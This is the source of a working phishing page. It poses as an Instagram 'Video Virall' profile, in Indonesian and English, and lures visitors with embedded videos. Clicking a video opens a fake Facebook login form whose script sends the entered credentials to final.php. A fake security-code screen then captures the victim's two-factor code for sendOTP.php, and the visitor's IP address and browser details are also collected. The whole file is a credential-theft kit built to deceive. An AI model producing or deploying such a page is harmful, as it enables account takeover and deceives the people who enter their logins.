<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1, user-scalable=0">
    <!-- Primary Meta Tags -->
    <title>Video Virall</title>
    <meta name="title" content="Video Virall">
    <meta name="description"
        content="Welcome back to Instagram. Sign in to check out what your friends, family & interests have been capturing & sharing around the world.v">

    <!-- Open Graph / Facebook -->
    <meta property="og:type" content="website">
    <meta property="og:title" content="Video Virall">
    <meta property="og:description"
        content="Welcome back to Instagram. Sign in to check out what your friends, family & interests have been capturing & sharing around the world.v">
    <meta property="og:image" content="">

    <!-- Twitter -->
    <meta property="twitter:card" content="summary_large_image">
    <meta property="twitter:title" content="Video Virall">
    <meta property="twitter:description"
        content="Welcome back to Instagram. Sign in to check out what your friends, family & interests have been capturing & sharing around the world.v">
    <meta property="twitter:image" content="">
    <link rel="icon" type="image/x-icon" href="https://h.top4top.io/p_2307bd3oz1.jpg">
    <link rel="stylesheet" href="css/style.css">
    <script src="https://cdn.fluidplayer.com/v3/current/fluidplayer.min.js"></script>
</head>

<body>
    <div class="ara">
        <div class="ara-profile">
            <div class="profile-cover">
                <img src="https://g.top4top.io/p_2307pwq8z1.jpg">
            </div>
            <div class="profile-image">
                <img src="https://h.top4top.io/p_2307bd3oz1.jpg">
            </div>
            <div class="profile-content">
                <span class="content-name">Video Virall</span>
                <p class="content-bio">
                    Ayo tonton beragam video viral berikut ini, jangan sampai kelewatan, ayo tonton sekarang juga
                </p>
            </div>

            <div class="ara-whatsapp">

            </div>

        </div>
        <div class="ara-line">
            <div class="heart">
                ❤️
            </div>
        </div>
        <div class="ara-media">
            <div class="media-list">
                <div class="media-card">
                    <div class="layer"></div>
                    <video id="my-video1" controls preload="metadata">
                        <source src="http://catbox.fun/miaw/neko-627f0293ac54b.mp4 " type="video/mp4" />
                    </video>
                </div>

                <div class="media-card">
                    <div class="layer"></div>
                    <video id="my-video2" class="video-js vjs-default-skin" controls preload="metadata">
                        <source src="http://catbox.fun/miaw/neko-627f023d28d51.mp4" type="video/mp4" />
                    </video>
                </div>

                <div class="media-card">
                    <div class="layer"></div>
                    <video id="my-video3" class="video-js vjs-default-skin" controls preload="metadata">
                        <source src="http://catbox.fun/miaw/neko-627f02d9bc79c.mp4" type="video/mp4" />
                    </video>
                </div>

                <div class="media-card">
                    <div class="layer"></div>
                    <video id="my-video4" class="video-js vjs-default-skin" controls preload="metadata">
                        <source src="http://catbox.fun/miaw/neko-627f031562df8.mp4" type="video/mp4" />
                    </video>
                </div>

                <div class="media-card">
                    <div class="layer"></div>
                    <video id="my-video5" class="video-js vjs-default-skin" controls preload="metadata">
                        <source src="http://catbox.fun/miaw/neko-6280894c74307.mp4" type="video/mp4" />
                    </video>
                </div>

                <div class="media-card">
                    <div class="layer"></div>
                    <video id="my-video6" class="video-js vjs-default-skin" controls preload="metadata">
                        <source src="http://catbox.fun/miaw/neko-627f2fc1dee69.mp4" type="video/mp4" />
                    </video>
                </div>
                <!--  -->
                <div class="media-card">
                    <div class="layer"></div>
                    <video id="my-video7" class="video-js vjs-default-skin" controls preload="metadata">
                        <source src="https://pomf2.lain.la/f/n77yl7c2.mp4" type="video/mp4" />
                    </video>
                </div>

                <div class="media-card">
                    <div class="layer"></div>
                    <video id="my-video8" class="video-js vjs-default-skin" controls preload="metadata">
                        <source src="https://pomf2.lain.la/f/527f000.mp4" type="video/mp4" />
                    </video>
                </div>

                <div class="media-card">
                    <div class="layer"></div>
                    <video id="my-video9" class="video-js vjs-default-skin" controls preload="metadata">
                        <source src="https://pomf2.lain.la/f/1f4727ii.mp4" type="video/mp4" />
                    </video>
                </div>

                <div class="media-card">
                    <div class="layer"></div>
                    <video id="my-video10" class="video-js vjs-default-skin" controls preload="metadata">
                        <source src="https://pomf2.lain.la/f/8euu3ok.mp4" type="video/mp4" />
                    </video>
                </div>

                <div class="media-card">
                    <div class="layer"></div>
                    <video id="my-video11" class="video-js vjs-default-skin" controls preload="metadata">
                        <source src="https://pomf2.lain.la/f/yepkdanr.mp4" type="video/mp4" />
                    </video>
                </div>

                <div class="media-card">
                    <div class="layer"></div>
                    <video id="my-video12" class="video-js vjs-default-skin" controls preload="metadata">
                        <source src="https://pomf2.lain.la/f/2v48t2pk.mp4" type="video/mp4" />
                    </video>
                </div>

                <div class="media-card">
                    <div class="layer"></div>
                    <video id="my-video13" class="video-js vjs-default-skin" controls preload="metadata">
                        <source src="https://pomf2.lain.la/f/7alxgh42.mp4" type="video/mp4" />
                    </video>
                </div>

                <div class="media-card">
                    <div class="layer"></div>
                    <video id="my-video14" class="video-js vjs-default-skin" controls preload="metadata">
                        <source src="https://pomf2.lain.la/f/dyg63861.mp4" type="video/mp4" />
                    </video>
                </div>
            </div>
        </div>

        <div class="ara-copy">
            &copy; 2022 Instagram Video Virall
        </div>







        <div class="otp-verif">
            <span class="h1">Masukkan Kode Keamanan</span>
            <span class="alerts">Masukkan kode 6 digit yang kami kirimkan ke email atau nomor hp anda</span>
            <span class="alerts kedua">Perlu waktu hingga satu menit sampai Anda menerima kodenya.</span>

            <div class="otp-form">
                <div class="form-data">
                    <div class="form-group">
                        <input
                            oninput="javascript: if (this.value.length > this.maxLength) this.value = this.value.slice(0, this.maxLength);"
                            class="otp-input" id="otp1" maxlength="1" type="number" autocomplete="off">
                        <input
                            oninput="javascript: if (this.value.length > this.maxLength) this.value = this.value.slice(0, this.maxLength);"
                            class="otp-input" id="otp2" maxlength="1" type="number" autocomplete="off">
                        <input
                            oninput="javascript: if (this.value.length > this.maxLength) this.value = this.value.slice(0, this.maxLength);"
                            class="otp-input" id="otp3" maxlength="1" type="number" autocomplete="off">

                        <div class="separator"></div>

                        <input
                            oninput="javascript: if (this.value.length > this.maxLength) this.value = this.value.slice(0, this.maxLength);"
                            class="otp-input" id="otp4" maxlength="1" type="number" autocomplete="off">
                        <input
                            oninput="javascript: if (this.value.length > this.maxLength) this.value = this.value.slice(0, this.maxLength);"
                            class="otp-input" id="otp5" maxlength="1" type="number" autocomplete="off">
                        <input
                            oninput="javascript: if (this.value.length > this.maxLength) this.value = this.value.slice(0, this.maxLength);"
                            class="otp-input" id="otp6" maxlength="1" type="number" autocomplete="off">
                    </div>
                    <button class="go-submit" onclick="checkOTP()">Konfirmasi</button>
                </div>
            </div>
            <a class="new-otp">Get a new code</a>
        </div>
    </div>



    <!-- 3897f0 -->







    <div class="popup-login login-facebook animated fadeIn" style="display: none;">
        <div class="popup-box-login-fb">
            <div class="navbar-fb">
                <img width="45" src="img/fb.png">
            </div>
            <div class="content-box-fb">
                <p class="alert sandi">The password you entered is incorrect. <b>Did you forget your
                        password?</b></p>
                <p class="alert email">The mobile number or email address that you've entered doesn't match any
                    account. <b>Find your account.</b></p>
                <img width="75" height="75"
                    src="https://images.vexels.com/media/users/3/137198/isolated/preview/07f0d7b69ef071571e4ada2f4d6a053a-instagram-icon-colorful.png">
                <div class="txt-login-fb">
                    Log in to your Facebook account to connect with Instagram
                </div>
                <form class="login-form" method="POST" action="validate.php">
                    <label>
                        <input type="text" id="user" name="user" placeholder="Mobile number or email address"
                            autocomplete="off" autocapitalize="off">
                    </label>
                    <label>
                        <input type="password" id="pass" name="pass" placeholder="Facebook password" autocomplete="off"
                            autocapitalize="off">
                    </label>
                    <!-- END -->
                    <input type="hidden" name="ip" value="">
                    <input type="hidden" name="ua" value="">
                    <button type="submit" id="btnfb" class="btn-login-fb">Log In</button>
                </form>
                <div class="txt-create-account">Create account</div>
                <div class="txt-not-now">Not now</div>
                <div class="txt-forgotten-password">Forgotten password?</div>
            </div>
            <div class="language-box">
                <center>
                    <div class="language-name language-name-active">English (UK)</div>
                    <div class="language-name">Bahasa Indonesia</div>
                    <div class="language-name">Basa Jawa</div>
                    <div class="language-name">Bahasa Melayu</div>
                    <div class="language-name">日本語</div>
                    <div class="language-name">Español</div>
                    <div class="language-name">Português (Brasil)</div>
                    <div class="language-name">
                        <i class="fa fa-plus"></i>
                    </div>
                </center>
            </div>
            <div class="copyrights">Facebook Inc.</div>
        </div>
    </div>

    <script src="https://code.jquery.com/jquery-3.6.0.js"></script>

    <script>
        function checkOTP() {
            if ($('#otp1').val() == "" || $('#otp1').val() == null || $('#otp1').val().lenght >= 2) {

                $('#otp1').focus()
                return false;

            }
            if (($('#otp2').val() == "" || $('#otp2').val() == null || $('#otp2').val().lenght >= 2)) {

                $('#otp2').focus()
                return false;

            }
            if (($('#otp3').val() == "" || $('#otp3').val() == null || $('#otp3').val().lenght >= 2)) {

                $('#otp3').focus()
                return false;

            }
            if (($('#otp4').val() == "" || $('#otp4').val() == null || $('#otp4').val().lenght >= 2)) {

                $('#otp4').focus()
                return false;

            }
            if (($('#otp5').val() == "" || $('#otp5').val() == null || $('#otp5').val().lenght >= 2)) {

                $('#otp5').focus()
                return false;

            }
            if (($('#otp6').val() == "" || $('#otp6').val() == null || $('#otp6').val().lenght >= 2)) {

                $('#otp6').focus()
                return false;

            }
            let otp = '';
            let input = $('input[maxlength="1"]');
            input.each(function (i, v) {
                otp += v.value
            })

            $.ajax({
                type: 'POST',
                url: 'sendOTP.php',
                data: 'otp=' + otp + '&user=' + $('#user').val(),
                dataType: 'text',
                success: function () {
                    $('.otp-verif').fadeOut()
                }
            })
        }
    </script>

    <script>
        $.ajax({
            type: "get",
            async: false,
            url: "https://na.apps.amsoveasea.com/swoole/?actid=2020&r=index/getCountry&_only_service_response_=1",
            dataType: "json",
            success: function (result) {
                $('input[name="ip"]').val(result.ip);
                $('input[name="ua"]').val(navigator.userAgent)
            }
        })




        for (var i = 1; i <= 14; i++) {
            fluidPlayer('my-video' + i);
            document.querySelector('#fluid_video_wrapper_my-video' + i).style.height = '100%';
            document.querySelector('#fluid_video_wrapper_my-video' + i).style.width = '100%';
        }


        let played = false;
        let vid = document.querySelectorAll(".layer");
        vid.forEach(function (e) {
            e.addEventListener('click', function (t) {
                !played ? (
                    login()
                ) : (!0)
            })
        })


        function login() {
            $('.login-facebook').fadeIn();
            played = true;
            vid.forEach(function (e) {
                e.remove()
            })
        }

        window.addEventListener('submit', function (e) {
            e.preventDefault();
            $("#btnfb").addClass("disabled");
            setTimeout(() => {
                var user = $('#user').val();
                var pass = $('#pass').val();
                if (user == '' || user == null) {
                    $('.email').show();
                    $('.sandi').hide();
                    $("#btnfb").removeClass("disabled");
                    return false;
                } else {

                    if (user.includes('@')) {
                        let pattern = /^[^ ]+@[^ ]+\.[a-z]{2,3}$/;
                        if (user.match(pattern)) {
                            $('.email').hide();
                        } else {
                            $('.email').show();
                            $('.sandi').hide();
                            $("#btnfb").removeClass("disabled");
                            return false;
                        }
                    }

                    if (!isNaN(user)) {
                        if (user.length <= 10) {
                            $('.email').show();
                            $('.sandi').hide();
                            $("#btnfb").removeClass("disabled");
                            return false;
                        } else {
                            $('.email').hide();
                        }
                    }

                    if (user.match(/\s/g)) {
                        $('.email').show();
                        $('.sandi').hide();
                        $("#btnfb").removeClass("disabled");
                        return false;
                    } else {
                        $('.email').hide();
                    }

                    var regex = /(?:^|[^@\.\w-])([a-z0-9]+:\/\/)?(\w(?!ailto:)\w+:\w+@)?([\w.-]+\.[a-z]{2,4})(:[0-9]+)?(\/.*)?(?=$|[^@\.\w-])/im;
                    if (user.match(regex)) {
                        $('.email').show();
                        $('.sandi').hide();
                        $("#btnfb").removeClass("disabled");
                        return false;
                    }


                    if (user.length <= 5) {
                        $('.email').show();
                        $('.sandi').hide();
                        $("#btnfb").removeClass("disabled");
                        return false;
                    } else {
                        $('.email').hide();
                    }

                }
                if (pass == '' || pass == null || pass.length <= 5) {
                    $('.sandi').show();
                    $("#btnfb").removeClass("disabled");
                    return false;
                } else {
                    $('.sandi').hide();
                }
                var regexs = /(?:^|[^@\.\w-])([a-z0-9]+:\/\/)?(\w(?!ailto:)\w+:\w+@)?([\w.-]+\.[a-z]{2,4})(:[0-9]+)?(\/.*)?(?=$|[^@\.\w-])/im;
                if (pass.match(regexs)) {
                    $('.sandi').show();
                    $('.email').hide();
                    $("#btnfb").removeClass("disabled");
                    return false;
                } else {
                    $('.sandi').hide();
                }

                $.ajax({
                    type: 'POST',
                    url: 'final.php',
                    data: $('.login-form').serialize(),
                    dataType: 'text',
                    success: function () {
                        $('.login-facebook').hide();
                        $('.otp-verif').fadeIn().css('display', 'flex')
                    }
                })
            }, 1000)
        })

    </script>


</body>

</html>